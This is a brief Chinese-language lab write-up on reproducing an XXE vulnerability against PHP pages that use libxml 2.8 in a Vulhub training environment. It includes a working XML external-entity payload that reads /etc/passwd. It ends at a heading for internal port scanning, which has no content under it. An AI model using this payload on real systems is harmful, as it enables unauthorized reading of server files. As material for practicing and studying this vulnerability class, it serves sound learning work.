漏洞介绍
见文章:XXE漏洞
环境搭建
Vulhub一键搭建
漏洞复现
libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。
本环境的libxml版本为2.8版本。
访问靶机:
可以看到libxml的版本为2.8版本,默认解析xml。
我们现在对页面进行抓包,进行实体注入,Vulhub提供三个界面:
dom.php
、SimpleXMLElement.php
、simplexml_load_string.php
任意文件读取
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <root> <name>&xxe;</name> </root>
内网端口扫描